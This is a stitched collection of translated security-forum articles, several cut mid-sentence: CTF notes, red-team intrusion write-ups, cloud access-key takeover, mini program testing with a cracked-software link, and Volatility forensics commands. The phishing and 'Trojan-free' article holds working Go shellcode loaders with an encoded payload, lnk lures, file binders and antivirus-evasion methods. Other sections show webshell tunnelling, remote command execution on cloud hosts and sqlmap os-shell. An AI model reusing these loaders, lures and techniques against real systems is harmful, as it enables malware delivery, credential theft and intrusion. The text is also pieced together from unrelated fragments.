with open('123.json', 'r', encoding='utf-8') as file:
    data = json.load(file)

info = []
for packet in data:
    if 'layers' in packet['_source'] and 'tcp' in packet['_source']['layers']:
        tcp_layer = packet['_source']['layers']['tcp']
        if 'tcp.payload' in tcp_layer:
            tcp_payload = tcp_layer['tcp.payload'].replace(':', '')
            info.append(tcp_payload)

planes_data = []
for i in info:
    msg = i[18:]
    # type code 19 is the airborne velocity message
    if pms.adsb.typecode(msg) >= 19 and pms.adsb.typecode(msg) <= 22:
        icao = pms.adsb.icao(msg)
        velocity_info = pms.adsb.velocity(msg)
        speed, track, vertical_rate, _ = velocity_info
        plane_info = {'icao': icao, 'speed': speed, 'track': track, 'vertical_rate': vertical_rate}
        planes_data.append(plane_info)

fastest_plane = max(planes_data, key=lambda x: x['speed'])
print(hashlib.md5(fastest_plane['icao'].upper().encode()).hexdigest())
# flag{4cf6729b9bc05686a79c1620b0b1967b}

happy chess

It should be an unintended solution: enter 9 positions at any time and exit the round directly, and it is counted as a success.

Strong Net Pioneer

speedup

Pure OSINT problem: it requires the digit sum of (2^27)!, and this value is directly on OEIS (A244060): https://oeis.org/A244060/list. After sha256, get the flag:
flag{bbdee5c548fddfc76617c562952a3a3b03d423985c095521a8661d248fad3797}

Have you found the PNG?

strings main.mem | grep 'Linux version'

After getting the kernel version, follow https://treasure-house.randark.site/blog/2023-10-25-MemoryForensic-Test/ to build a Linux profile.

python2 vol.py -f C:\Users\22826\Desktop\main.mem --profile=LinuxUbuntu2004x64 linux_find_file -L | findstr 'Desktop'

You can find a file on the desktop: have_your_fun.jocker. Tried to export it, but it was empty:

python2 vol.py -f C:\Users\22826\Desktop\main.mem --profile=Linux
-
Title: Record a case of a protective internet celebrity team
0x00 Introduction

I was busy realizing my e-sports dream (League of Legends), but one afternoon a master suddenly contacted me and said I could join the group to play on a provincial protection (HVV) team without an interview. How could I miss such a good practical opportunity? (For fun; don't learn from me ^^)

0x01 An out-of-the-box corporate intranet journey

Preparation

The story begins with a guy handing me a system nday shell. ipconfig showed a 10.x intranet, and this kind of intranet is generally large. But this nday had already been swept by others: the directory was full of webshells. Something felt wrong. What was this? An unknown hacker had supposedly run fscan yesterday, but the target unit had not been eliminated yet, so let's play first.

Prepare to go online, but can't.

First, run fscan through Godzilla and scan the B segment. (You should first ping-sweep the C segment a little and leave a machine with a back route. Something was off about this one; otherwise the traffic detection equipment would have detected it, shut the site down and sent it straight out.)

A bunch of weak passwords, redis

Neo-reGeorg use

Use the Neo-reGeorg forward tunneling tool to proxy traffic. Neo-reGeorg is a common HTTP forward tunneling tool, an upgraded version of reGeorg, adding features such as content encryption, request header customization and response code customization.

python3 neoreg.py generate -k xxx --file 404.html --httpcode 404

This generates a webshell with password xxx. What's more interesting is the 404 template function the tool added: copy in the target site's actual 404 HTML, and the generated webshell returns a 404 when accessed directly, which is very helpful for hiding the file.

Upload to the target site.

python3 neoreg.py -k xxx -u http://
-
Title: Cloud host secret key (ak/sk) leak and utilization case
Preface

As a tool to reduce enterprise resource costs, the cloud platform has become an indispensable part of every major company's system deployment. Since applications need to communicate with other internal and external services and use credentials or keys in large quantities, one type of vulnerability is often encountered during vulnerability mining: cloud host key leakage. This vulnerability allows an attacker to take over the cloud server's permissions and view or delete internal sensitive information. This article covers how to discover secret key leaks and how to use them after obtaining them.

0x01 Vulnerability Overview

Alibaba Cloud and Tencent Cloud hosts use the Access Key Id / Secret Access Key mechanism to verify the identity of a request's sender. The Access Key Id (AK) identifies the user, and the Secret Access Key (SK) is the key the user uses to produce the authentication string and the cloud vendor uses to verify it; the SK must be kept confidential. After the cloud host receives the user's request, the system uses the SK corresponding to the AK, with the same authentication mechanism, to generate the authentication string and compares it with the one contained in the request. If they match, the system believes the user has the specified operation permission and performs the operation; if they differ, the system ignores the operation and returns an error code. The AK/SK scheme is symmetric: both sides hold the same secret.

0x02 Common scenarios for secret key leakage

From the above, if the cloud host key is leaked, the cloud host can be controlled, which is very harmful. Common leak scenarios during vulnerability mining:

1. Debugging on error page or debug information.
2. GitHub keyword search, FOFA, etc.
3. Website configuration files.
4. Leaked in JS files.
5. Source code leaks: decompile APKs and mini programs and search globally.
6. Leaks during file upload and download, such as uploading pictures or documents.
7. HeapDump files.

0x03 Practical Examples

Case 1: AK/SK leak in a HeapDump file

A HeapDump file is a snapshot of the running memory of the JVM. It is usually used for performance analysis, but because it holds objects, classes and related data, leaking it also leaks information.

1. Secret key leakage caused by the Spring Actuator heapdump file.
Scan tool: https://github.com/F6JO/RouteVulScan
Unzip tool: https://github.com/wyzxxz/heapdump_tool
When visiting a website, testing finds Spring Actuator unauthorized access. Check whether a heapdump file is present, download and decompress it, and search globally to find the secret key leak.

2. Obtained through a brute-forced path.
There are sometimes sensitive file leaks in the file storage location: for example, when capturing the request for a file download from the cloud server, the file name can be brute-forced at the request location and the cloud server returns a sensitive file containing the access key. After obtaining the file address, download it and use the tool to extract the content.
Disclosure of AK/SK. Tool link: https://github.com/whwlsfb/JDumpSpider

Case 2: JS file leaks secret key

Tool used: trufflehog. Visit a website and use the trufflehog plug-in to detect it; the Findings panel shows whether there is any key leakage (asynchronously loaded scripts are covered too).

Case 3: Leaks at function points such as mini program upload

A mini program opens; go to the avatar in the personal center. Click on the avatar and capture the packet: you can see the accesskeyid/accesskeysecret leak.
During penetration testing, pay more attention to uploading pictures, downloading files, viewing pictures, etc.; AK/SK may be leaked there.

Case 4: AK/SK leak in configuration information

Common in Nacos background configuration lists. Open an entry and you can see configuration information, including the leaked AK/SK.

0x04 Exploit

1. AK/SK takes over the bucket.
Use tools or the cloud host management platform to take over the bucket directly. After taking over the bucket, you can view, upload, edit and delete the information in it.
OSS Browser, the OSS graphical management tool provided by Alibaba Cloud: https://github.com/aliyun/oss-browser
After logging into the bucket you can view, upload, delete and download files in the bucket, which is the damage of a bucket takeover.
Tencent Cloud host takeover platform: https://cosbrowser.cloud.tencent.com/web/bucket
Xingyun Manager (supports multiple cloud vendors): you can import cloud hosts from different vendors. Select Host Import. After taking over the host through Xingyun Manager, you can not only access the OSS service but also directly reset the server password and take over the server, then restart, pause, modify host information, etc.

2. After getting AK/SK, try to execute commands on the host.
CF cloud environment exploitation framework: https://github.com/teamssix/cf/releases
Use cf to view the operation permissions the key has on the host; you can see that commands can be executed:
cf tencent cvm exec -c whoami
Reference for details: https://wiki.teamssix.com/CF/ECS/exec.html
For Alibaba Cloud host RCE, tool link: https://github.com/mrknow001/aliyun-accesskey-Tools
Enter AK/SK to query the hosts, select the host name to fill in, and check whether the cloud assistant list is true or false; if true, commands can be executed.

Reprinted from the original link: https://forum.butian.net/share/2376
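As an added example (written in Python for this page, not code from the original article), here is the detection side of two leak patterns on this page: the AK/SK strings that this article finds in JS bundles, heap dumps and Nacos configs, and the Jasypt setup from the Nacos section earlier on the page, where the ENC(...) ciphertext and the jasypt.encryptor.password that decrypts it sit in the same file. The key-ID prefixes "LTAI" (Alibaba Cloud) and "AKID" (Tencent Cloud) are assumptions used as heuristics, and every sample input is constructed.

```python
"""Flag leaked cloud credentials and self-defeating Jasypt setups in text.

Added example (not from the original article): a small scanner over the kinds
of artefacts the article lists (JS bundles, YAML or .properties configs, text
pulled from a heap dump).  It reports
  * Alibaba Cloud AccessKey IDs (assumed prefix "LTAI") and Tencent Cloud
    SecretIds (assumed prefix "AKID"), noting whether a secret sits on the
    same line, and
  * Jasypt ENC(...) values that share a file with a literal
    jasypt.encryptor.password, the weakness noted in the Nacos/Jasypt section.
All sample inputs below are constructed.
"""
import re

# Assumed key-ID prefixes: heuristics, not vendor guarantees.
AK_PATTERNS = {
    "alibaba_access_key_id": re.compile(r"\bLTAI[A-Za-z0-9]{12,}\b"),
    "tencent_secret_id": re.compile(r"\bAKID[A-Za-z0-9]{13,}\b"),
}
# A secret-looking value (20+ base64-ish chars) assigned to a *secret* key.
SECRET_VALUE = re.compile(
    r"(?i)(accesskeysecret|secretkey|secret)\s*[:=]\s*['\"]?([A-Za-z0-9+/=_-]{20,})"
)
ENC_VALUE = re.compile(r"ENC\(([^)]+)\)")


def flat_keys(text: str) -> dict:
    """Flatten a simple YAML mapping or .properties file into dotted keys.

    Only nested mappings with scalar leaves are handled, which covers the
    application.yml shape shown in the text; lists and comments are ignored.
    """
    result, stack = {}, []          # stack holds (indent, key) pairs
    for raw in text.splitlines():
        line = raw.rstrip()
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        if "=" in line and ":" not in line.split("=", 1)[0]:
            key, value = line.split("=", 1)       # .properties style
            result[key.strip()] = value.strip()
            continue
        indent = len(line) - len(line.lstrip())
        key, _, value = line.strip().partition(":")
        while stack and stack[-1][0] >= indent:
            stack.pop()
        stack.append((indent, key.strip()))
        if value.strip():
            result[".".join(k for _, k in stack)] = value.strip()
    return result


def scan_jasypt(config_text: str) -> list:
    """Report ENC(...) values whose decryption password is a literal in the same file."""
    keys = flat_keys(config_text)
    pw = keys.get("jasypt.encryptor.password")
    literal_pw = pw is not None and not pw.startswith("${")   # ${ENV} placeholder is fine
    return [
        f"{key}: ENC value decryptable with in-file jasypt.encryptor.password"
        for key, value in keys.items()
        if literal_pw and ENC_VALUE.search(value)
    ]


def scan_cloud_keys(text: str) -> list:
    """Return (line, kind, key_id, secret_on_same_line) for every key ID found."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for kind, pattern in AK_PATTERNS.items():
            for m in pattern.finditer(line):
                findings.append((lineno, kind, m.group(0), bool(SECRET_VALUE.search(line))))
    return findings


# Constructed JS bundle fragment, of the kind described in Case 2 above.
SAMPLE_JS = (
    "var oss = new OSS({region: 'oss-cn-hangzhou',\n"
    "  accessKeyId: 'LTAI5tEXAMPLEexampl1', accessKeySecret: 'ExampleSecretValue0123456789abcd'});\n"
)

# Constructed Spring config: ciphertext and its key in one file (weak) ...
WEAK_YAML = """\
jasypt:
  encryptor:
    password: hunter2-never-do-this
spring:
  datasource:
    url: jdbc:mysql://db.internal:3306/app
    password: ENC(Y2lwaGVydGV4dA==)
"""
# ... and the corrected form, where the key is injected from the environment.
HARDENED_YAML = WEAK_YAML.replace("hunter2-never-do-this", "${JASYPT_ENCRYPTOR_PASSWORD}")

if __name__ == "__main__":
    print(scan_cloud_keys(SAMPLE_JS))
    print(scan_jasypt(WEAK_YAML), scan_jasypt(HARDENED_YAML))
```

The Jasypt check deliberately treats a ${...} placeholder as acceptable: the ciphertext in the file is then only as exposed as the environment or secret store that supplies the password, which is the property the in-file password destroys.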
-
Title: The latest WeChat mini program packet capture and testing cases in 2023
Most online guides capture mini program traffic with an Android emulator. Here we use BurpSuite + Proxifier + the WeChat desktop client.

Environment preparation
Burp 2023.9.2
Proxifier 4.5
Proxifier is a very powerful SOCKS5 client that lets programs with no proxy support work through HTTPS or SOCKS proxies or proxy chains. It is paid software with a 31-day free trial; here is a cracked version link:
Link: https://pan.baidu.com/s/14QElyGxDpMBGTuCFTPl4tQ?pwd=7o50 Extraction code: 7o50
Install it with the defaults and open it after installation. Click register, enter any name, paste any registration code, and click OK.

Proxifier configuration
Open Proxifier and click Profile to add a proxy server: address 127.0.0.1, a port of your choice (8888 here), protocol HTTPS.
Then add a proxy rule. When WeChat opens a mini program, an extra WeChatAppEx process appears; this is the mini program's process. In the rule, Applications selects the mini program process (you can enter it manually) and Action selects the proxy server you just created.

Burp configuration
Edit the proxy listener so that Burp listens on 127.0.0.1:8888, the same address as the proxy server configured in Proxifier. Now when WeChat opens a mini program, the WeChatAppEx traffic passes through Proxifier first and then reaches Burp on 127.0.0.1:8888, and you can test the requests in Burp just as you would with an ordinary website.

Mini program decompilation
WeChat's file save location can be found in WeChat's settings. The Applet folder in that directory is where mini program cache files are stored. The more mini programs you use, the more corresponding folders there are. If you cannot find the package of the mini program you want to test, locate it by modification date, or simply delete all cached files and reopen the mini program.
The cache folder corresponding to the mini program we want to test is then easy to identify, and inside it is the package we want to unpack. It is an encrypted package: when a user searches for or scans the QR code of a mini program in WeChat, the WeChat backend packages the mini program into a .wxapkg file and sends it to the user's device. This format is essentially an archive containing all of the mini program's code, resources and configuration files, plus a specific description file, app.json.

Since it is encrypted, decrypt it first. The decryption tool:
Link: https://pan.baidu.com/s/1BzfvBVwD4vLpakX9PAyrsg?pwd=qz3z Extraction code: qz3z
Select the encrypted package. After decryption succeeds, the output is in the wxpack directory under the tool's directory.

Next, decompile. First install Node.js (download: https://nodejs.org/zh-cn/download/), installing with the defaults, then add it to the environment variables; afterwards the node command works in cmd.
Use the decompilation tool wxappUnpacker:
Original link: https://github.com/system-cpu/wxappUnpacker
Network disk link: https://pan.baidu.com/s/19O2KDqWn2Zyars8AREJ1LQ?pwd=22qj Extraction code: 22qj
Go to the tool directory and install the dependencies, executing the commands one by one:
npm install esprima
npm install css-tree
npm install cssbeautify
npm install vm2
npm install uglify-es
npm install js-beautify
Then decompile:
node wuWxapkg.js <path to the decrypted .wxapkg>
After execution, a directory is generated alongside the decompiled package.
That directory contains the decompiled files.

Download WeChat Developer Tools
Official download link: https://servicewechat.com/wxa-dev-logic/download_redirect?type=win32_x64&from=mpwiki&download_version=1062308310&version_type=1
Open it after installation, click the add sign, select the decompiled directory, and for the backend service choose "do not use cloud service". Click OK and you can view the mini program's JS code.

Testing
Clicking the "send verification code" function hits the /api/shop/ipad/login/sms path. Searching the code for the sending function finds only /login/sms, so the path rule is basically confirmed: prefix the interfaces found in the code with /api/shop/ipad and look for other interfaces that can be called without authorization. Find a home page path: sending the packet directly returns 404, while sending it with /api/shop/ipad prefixed confirms the path is correct, although it is not unauthenticated. One path not existing does not mean all interfaces are missing; perhaps several interfaces lack authentication, which would lead to unauthorized access, information leakage, etc.

Getshell by accident
Continue with the interface that sends the verification code and check whether there is SMS bombing or the like. The /login/sms interface receives a mobile parameter via POST. Construct the packet: entering a non-existent mobile number returns "incorrect mobile number", and entering a real one also errors, so possibly only accounts that exist in the system are valid. When you see parameters, try a single quote. Add a single quote: oh, waiver +1. You can tell .NET is used from the response packet. I personally think this framework has a lot of injection, and I tried manual injection without echo.
SQLmap in one go, HTTPS plus the --force-ssl parameter. SQL injection was confirmed, and it was stacked injection; try --os-shell.

Reprinted from the original link: https://forum.butian.net/share/2477
-
Title: Fishing techniques and Trojan-free skills
Brief description
Phishing is a common method in offensive and defensive confrontation. Attackers usually disguise themselves as trustworthy entities such as legal institutions, companies or individuals to lure victims into revealing sensitive information or performing malicious operations. It can quickly open a breach in the target and get into the intranet to score points. When delivering Trojans, evading anti-virus detection has to be considered. This article covers some common phishing methods and Trojan anti-virus evasion.

Information collection
Batch mailbox collection:
https://app.snov.io/
http://www.skymem.info/
Search engines: corporate mailboxes generally sit behind an email gateway and delivery is easily bounced, so we need to choose private mailboxes or mailboxes not blocked by the mail server, for example the public-facing addresses for reports or recruitment. Relevant syntax:
site:'xxx.com' report
site:'xxx.com' recruitment
xx company report @126.com
xx company recruitment @qq.com

Phishing techniques
Social engineering phishing
First comes target selection. Target groups: people with weak security awareness such as HR, managers and finance are preferred. Prepare multiple scenarios in advance to deal with them. Choose a branch of the target company, where the success rate is higher; think through the wording and responses in advance to avoid being discovered; preferably not the headquarters, and avoid the IT and information security departments.
Experienced social engineers can try phishing by phone, gain trust, and then add WeChat to send the Trojan (this requires exceptional composure and adaptability; I learned a lot from Pan Gaogong before).
Email phishing
Mass emails: not recommended, they are easily discovered by administrators or intercepted by the email gateway.
Targeted delivery to collected personal email addresses: recommended, highly covert.
Welfare subsidy notices: follow current topics and use welfare activities to attract the target's clicks; the phishing link can be converted to a QR code and sent.
Resume delivery: when facing a large number of resumes, HR will not check the suffix carefully.
Can't write phishing copy? It doesn't matter; don't write by hand what can be generated automatically. Credit to our ChatGPT brother here.
Report letter: real-name reports and complaints to xxx are generally handled and answered quickly.
Phishing file disguise
General tips: Trojans should be compressed with a password and hidden contents, or double-compressed, to bypass email gateway detection to some extent. Choose unusual suffixes that still execute as EXE, such as scr or com. Use a long file name; if the file name displays incorrectly, the suffix will not be visible in the preview.
lnk fishing If you know that the target unit is not using 360 Tianqing, you can use the lnk file for phishing (360 will intercept) Fill in the shortcut target position: %windir%\system32\cmd.exe /c start .\.__MACOS__\.__MACOS__\.__MACOS__\.__MACOS__\.__MACOS1__\xxx.doc amp;amp; C:\Windows\explorer.exe '.\.__MACOS__\.__MACOS__\.__MACOS1__\fsx.exe' Icon Change Path Selection: C:\\Program Files (x86)\\Microsoft\\Edge\\Application %SystemRoot%\\System32\\imageres.dll %SystemRoot%\\System32\\shell32.dll Box Error Tips Run msgbox to prompt "File is corrupted" and other confusing content vbs implementation On Error Resume Next WScript.Sleep 2000 msgbox 'The current file is corrupt, please change the tool to open it',64,'tip' Go code implementation package main import ( 'github.com/gen2brain/dlgs' ) func box() { _, err :=dlgs.Info('Tip', 'The current file is corrupted, please change the tool to open') if err !=nil { panic(err) } } Realize the effect File Bundler Bind normal files and malicious Trojans. After running, the exe itself will be deleted, and then the normal files will be released and opened in the current directory, and the Trojans will be released to the C:\Users\Public\Videos directory to run Version 1.1 bypass regular soft-kill (360, def, turtle, etc.) Version 1.2 Added files automatically hide after they are released Effect realization Common soft-killing types Soft-killing type Soft-killing features Turquoise There are many restrictions on compilation parameters, and the hash and string features are recognized. The static can be dynamically executed is basically not detected and killed. Some go libraries are called to report poison. 360 Single 360 check is not high. After installing antivirus, your son becomes a father. The killing power is greatly improved. The antivirus will automatically upload samples. It is easy to detect and kill after the cloud is released for a while. 
It is recommended to use separate loading methods and use anti-sandbox code to extend the time of the horse. 360 core crystal After opening, there is no big impact on the overall killing performance. Avoid loading shellcode using process injection. Execute the command to use the bof plugin as a replacement. Defender Added cobaltstrike rules, and it is recommended to use Stageless, which is better than Stage. The sleep_mask parameter is enabled in version 4.5 to enhance the killing ability, and the detection rate of large files is not high. Basic loading method The following is just a basic example, which only implements the function of encryption, decryption and loading. First, use python scripts to encrypt the payload.c file import base64 originalShellcode=b'\xfc\xe8\x89\x00' encryptedShellcode=bytes([byte ^0xFF for byte in originalShellcode]) encodedShellcode=base64.b64encode(encryptedShellcode).decode('utf-8') print(encodedShellcode) Fill in encryptedShellcode for the output content to compile package main import ( 'encoding/base64' 'syscall' 'unsafe' 'github.com/lxn/win' 'golang.org/x/sys/windows' ) func main() { //Decrypt shellcode content via base64 and XOR win.ShowWindow(win.GetConsoleWindow(), win.SW_HIDE) encryptedShellcode :='iz/0k4efv3d3dzYmNiclJiE/RqUSP/wlFz/8JW8//CVXP/wFJz94wD09Oka+P0a320sWC3VbVza2vno2draVmiU2Jj/8JVf8NUs/dqcR9g9vfHUCBfz3/3d3dz/ytwMQP3anJ/w/bzP8N1c+dqeUIT+Ivjb8Q/8/dqE6Rr4/RrfbNra+ejZ2tk+XAoY7dDtTfzJOpgKvLzP8N1M+dqcRNvx7PzP8N2s+dqc2/HP/P3anNi82LykuLTYvNi42LT/0m1c2JYiXLzYuLT/8ZZ44iIiIKh13PskAHhkeGRIDdzYhPv6RO/6GNs07AFFwiKI/R r4/RqU6Rrc6Rr42JzYnNs1NIQ7QiKKe5Hd3dy0//rY2z8x2d3c6Rr42JjYmHXQ2JjbNIP7osYiinA4sP/62P0alPv6vOka+JR93RbfzJSU2zZwiWUyIoj/+sT/0tCcdfSg//obNaHd3dx13H/dEd3c+/pc2znN3d3 c2zQIx6fGIoj/+hj/+rT6wt4iIiIg6Rr4lJTbNWnFvDIii8rd48up2d3c/iLh48/t2d3ecxJ6Tdnd3n/WIiIhYBAMWAx4UWB0EWB0GAhIFDlpEWURZRVkEGx4aWRoeGVkdBHdhI6t+16t+1fOvaU170U01iyzbpfay 
y1/2ar3+Ctaxwg13pLfzUvyPdjEAdyIEEgVaNhASGQNNVzoYDR4bGxZYQllHV18gHhkTGAAETFciTFcgHhkTGAAEVzkjV0JZRkxXEhlaIiRMVwUBTUZZQFlCXlcwEhQcGFhFR0dDRkZHQFcxHgUSERgPWEZZR1dfF g9een138a3Jhf8SuTLptsakGlHpCzEfaWu1GBbwmbCC5spmVmyh80fqMODP2ALXgmypFSNWG7SVeI0OybyhAGGyF4I4kOtTOz1MqEL3Bv8empA2KC6kL9eYO3xP4ukic3tfP++yRqP8gYDC1Aq3kBknsTnkPu3RSJ oVXLtaD3jO3ibMl+cBpDBioUbhePdlxTvlhD+OZ/NDXSwjf1y7hgK70678/6sPEZl2VdgAUuFa17KFDBoUq6Cq9OLDOu5GFZp42AYcsmoQmwd8Xnc2yYfC1SGIoj9Gvs13dzd3Ns93Z3d3Ns43d3d3Ns0v0ySSiKI /5CQkP/6QP/6GP/6tNs93V3d3Pv6ONs1l4f6ViKI/9LNX8rcDwRH8cD92tPK3AqAvLy8/cnd3d3cntJ8IioiIBBIFAR4UEloSAxMVQEMZEVpGREdAQEdHT0ZPWQQfWRYHHhAAWQMSGRQSGQMUBFkUGBp3coKWdw==' decodedShellcode, _ :=base64.StdEncoding.DecodeString(encryptedShellcode) for i :=0; i lt; len(decodedShellcode); i++ { decodedShellcode[i] ^=0x77 } //Get the VirtualAlloc function in kernel32.dll kernel32, _ :=syscall.LoadDLL('kernel32.dll') VirtualAlloc, _ :=kernel32.FindProc('VirtualAlloc') //Allocate memory and write shellcode content allocSize :=uintptr(len(decodedShellcode)) mem, _, _ :=VirtualAlloc.Call(uintptr(0), allocSize, windows.MEM_COMMIT|windows.MEM_RESERVE, windows.PAGE_EXECUTE_READWRITE) if mem==0 { panic('VirtualAlloc failed') } buffer :=(*[0x1_000_000]byte)(unsafe.Pointer(mem))[:allocSize:allocSize] copy(buffer, decodedShellcode) //Execute shellcode syscall.Syscall(mem, 0, 0, 0, 0) } Universal soft-killing skills Remote loading or file separation loading is preferred, but there are also some disadvantages. The former may be traced or blocked by the security device, and the latter requires two files to be more suitable for rights protection. Garbage code filling, perform harmless operations before loading shellcode, interfering with sandbox and soft-killing judgments, or bypass detection by delayed execution or increasing the volume of the program. Choose niche language to write and create loader features. In addition to CS, tools can also use vshell and other self-written C2. 
One-click generation without killing I am shameless and come to Amway to recommend a github project. Ahem, if you think it's OK, you can click a star⭐ The master of killing without killing Wang Chao's attack on the demons https://github.com/wangfly-me/LoaderFly Thousand Machines-Red Team Free Trojans Automatically generate https://github.com/Pizz33/Qianji Influence of Compilation Parameters go: -race race detection compilation -ldflags '-s -w' Remove compile information -ldflags '-H windowsgui' Hide window garble (obfuscation library): -tiny Delete extra information -literals Confused text -seed=random random seed encoded by base64 For example, if you compile a harmless code, use the -literals parameter, 360 will still report poison, and if you don't add it, you won't report poison. package main func main() { //Two numbers to multiply num1 :=5 num2 :=3 result :=0 //Use a for loop to perform multiplication for i :=0; i lt; num2; i++ { result +=num1 } } -H Windows gui parameters will also have a great impact on the exemption. 
If you need to hide the black box, you can use the following code to replace it (but there are still black boxes under win11) package main import 'github.com/lxn/win' func main(){ win.ShowWindow(win.GetConsoleWindow(), win.SW_HIDE) } func box()int{ FreeConsole :=syscall.NewLazyDLL('kernel32.dll').NewProc('FreeConsole') FreeConsole.Call() return 0 } func main() { box() Static feature processing Obfusal go low version https://github.com/boy-hack/go-strip go high version https://github.com/burrowers/garble mangle Replace String https://github.com/optiv/Mangle Mangle.exe -I xxx.exe -M -O out.exe Comparison before and after mangle processing, it can be found that the feature string of Go compiled is replaced with random characters base64 encoding variable cmd :=exec.Command('rundll32.exe', 'xxx') Key strings are encoded for Base64 and replace variable values at the corresponding position encodedCommand :='cnVuZGxsMzIuZXhl' encodedArguments :='MTExTdGFydA==' //Decode Base64 encoded commands and parameters decodedCommand, _ :=base64.StdEncoding.DecodeString(encodedCommand) decodedArguments, _ :=base64.StdEncoding.DecodeString(encodedArguments) cmd :=exec.Command(string(decodedCommand), string(decodedArguments)) QVM Bypass Add resources 1. 
Add information such as picture tag name copyright, you can use the following items to add one click https://github.com/Pizz33/360QVM_bypass https://github.com/S9MF/my_script_tools/tree/main/360QVM_bypass-public https://github.com/langsasec/Sign-Sacker Behavioral Characteristics Run the shellcode directly and will usually directly report qvm package main import ( 'syscall' 'unsafe' ) var ( ntdll=syscall.MustLoadDLL('ntdll.dll') VirtualAlloc=kernel32.MustFindProc('VirtualAlloc') RtlCopyMemory=ntdll.MustFindProc('RtlCopyMemory') ) const ( MEM_COMMIT=0x1000 MEM_RESERVE=0x2000 PAGE_EXECUTE_READWRITE=0x40 ) func main() { addr, _, err :=VirtualAlloc.Call(0, uintptr(len(decryt)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) if err !=nil amp;amp; err.Error() !='The operation completed successfully.' { syscall.Exit(0) } _, _, err=RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(amp;decryt[0])), uintptr(len(decryt))) if err !=nil amp;amp; err.Error() !='The operation completed successfu
-
Title: Record an internal network tour during an offensive and defensive drill
Foreword
This was an offensive and defensive drill authorized by the customer, from phishing on the external network to roaming the intranet, and it was a lucky one. I drew the attack path as a flowchart, and the write-up follows it. The flowchart is as follows.

External network phishing
First, collect relevant information from the external network, add the customer service staff on WeChat, and pose as a business customer to induce them to click the Trojan. The process is as follows. Customer service came online successfully, as shown below. Then the company's director was also phished over WeChat, with "business cooperation" as the pretext to induce them to click the Trojan, and also came online.

Intranet roaming
Logging into related systems: looking through the customer service terminal, I found a password book, logged into the email system with it, and found a large number of internal office emails. Logging into the operations platform through the password book revealed 2000w+ records. The operations system was also found to have SQL injection; sqlmap was used to obtain the database users and passwords. The password book also gave access to the Zabbix system.

A source code package was found and the audit began! While flipping through another terminal's files I found a compressed package, install.zip; decompressing and viewing it showed the source code of a certain system, written in PHP. The audit found an arbitrary file upload vulnerability in the backend plug-in addition function of the system. By adding plug-ins, a webshell could be written to the server, and multiple server permissions were obtained.
The focus is the Build() function, which writes the requested config data directly into config.php in the plug-in directory. Constructing the request packet in Burp confirmed the analysis, and getshell succeeded. Multiple server permissions were obtained through this 0day.

Controlling cloud assets
Through the machines controlled earlier, I flipped through the configuration files on one of them, found the database account and password, logged into the database and found an AK/SK in one of the tables, with which all systems on Alibaba Cloud could be taken over.

Getting GitLab
GitLab backend permissions were obtained from the Linux history. Detection showed that GitLab had the historical vulnerability CVE-2021-22205, which was used to obtain the GitLab server permissions. GitLab's Redis unauthorized access vulnerability was then used to write an SSH key and obtain root. Reading the GitLab code revealed the ZenTao database account and password, which was a nice find. A small suggestion here: if you find GitLab on an intranet, take it as early as possible; there is a lot to gain. The root password was modified directly in the database to enter the backend, and getshell was obtained through a backend function.

Conquering Jenkins
Through the GitLab system, nginx was found on the machine. Checking the nginx configuration files showed that multiple systems such as Sonar and Jenkins were reverse-proxied. By configuring logging in jenkins.conf, the Jenkins user login cookie format was obtained, and the cookie was used to log into Jenkins successfully.

Summary
Through social engineering phishing I opened the breach, took a long circle through the intranet and obtained some results. See you next time.

Reprinted from the original text: https://forum.butian.net/share/2583
-
Title: Detailed explanation of the Volatility memory forensics tool commands
1. Environment installation
1.1 Install Volatility2 under Kali
Note: Volatility2 is generally better than Volatility3.
wget https://bootstrap.pypa.io/pip/2.7/get-pip.py
python2 get-pip.py
python2 -m pip install Crypto
python2 -m pip install pycryptodome
python2 -m pip install pytz
python2 -m pip install Pillow          # PIL graphics processing library
apt-get install pcregrep python2-dev   # plugin installation dependencies
python2 -m pip install distorm3        # disassembly library
python2 -m pip install openpyxl        # read and write Excel files
python2 -m pip install ujson           # JSON parsing
python2 -m pip uninstall yara          # malware classification tool
python2 -m pip install pycrypto        # encryption toolset
python2 -m pip install construct       # mimikatz dependency library
# Download the YARA source archive from https://github.com/virustotal/yara/releases
tar -zxf yara-4.4.0.tar.gz
cd yara-4.4.0
sudo apt-get install automake libtool make gcc pkg-config
sudo apt-get install flex bison libssl-dev
./bootstrap.sh
./configure
make
sudo make install
sudo sh -c 'echo "/usr/local/lib" >> /etc/ld.so.conf'
sudo ldconfig
yara -h
git clone https://github.com/volatilityfoundation/volatility.git
cd volatility
python2 setup.py install

1.2 Install under Windows
https://www.volatilityfoundation.org/releases

2. Common commands
2.1 View the memory image's system information
volatility.exe -f worldskills3.vmem imageinfo

2.2 View the user names in the memory image's registry
volatility.exe -f worldskills3.vmem --profile=Win7SP1x64 printkey -K "SAM\Domains\Account\Users\Names"

2.3 Use hashdump to get the SAM hashes
volatility.exe -f worldskills3.vmem --profile=Win7SP1x64 hashdump

2.4 Use lsadump to view clear-text passwords (LSA secrets)
volatility.exe -f worldskills3.vmem --profile=Win7SP1x64 lsadump

2.5 View network connection information
volatility.exe -f worldskills3.vmem --profile=Win7SP1x64 netscan
This also lets you spot a mining process on the system and obtain the address of the pool it connects to.

2.6 Check the current host name
The host name is queried through the registry. First use hivelist to get the SYSTEM hive's virtual address in the memory image, then walk down the key names:
volatility.exe -f worldskills3.vmem --profile=Win7SP1x64 hivelist
volatility.exe -f worldskills3.vmem --profile=Win7SP1x64 -o 0xffffff8a000024010 printkey
volatility.exe -f worldskills3.vmem --profile=Win7SP1x64 -o 0xffffff8a000024010 printkey -K "ControlSet001"
volatility.exe -f worldskills3.vmem --profile=Win7SP1x64 -o 0xffffff8a000024010 printkey -K "ControlSet001\Control"
volatility.exe -f worldskills3.vmem --profile=Win7SP1x64 -o 0xffffff8a000024010 printkey -K "ControlSet001\Control\ComputerName"
volatility.exe -f worldskills3.vmem --profile=Win7SP1x64 -o 0xffffff8a000024010 printkey -K "ControlSet001\Control\ComputerName\ComputerName"
You can also dump the whole hive with hivedump and search it for the key name directly, but this takes much longer:
volatility.exe -f worldskills3.vmem --profile=Win7SP1x64 hivedump -o 0xffffff8a000024010 > system.txt

2.7 Obtain the information stored by the IE browser
volatility.exe -f worldskills3.vmem --profile=Win7SP1x64 iehistory

2.8 Query the system service names
volatility.exe -f worldskills3.vmem --profile=Win7SP1x64 svcscan

2.9 Find traces of abnormal programs implanted in the system
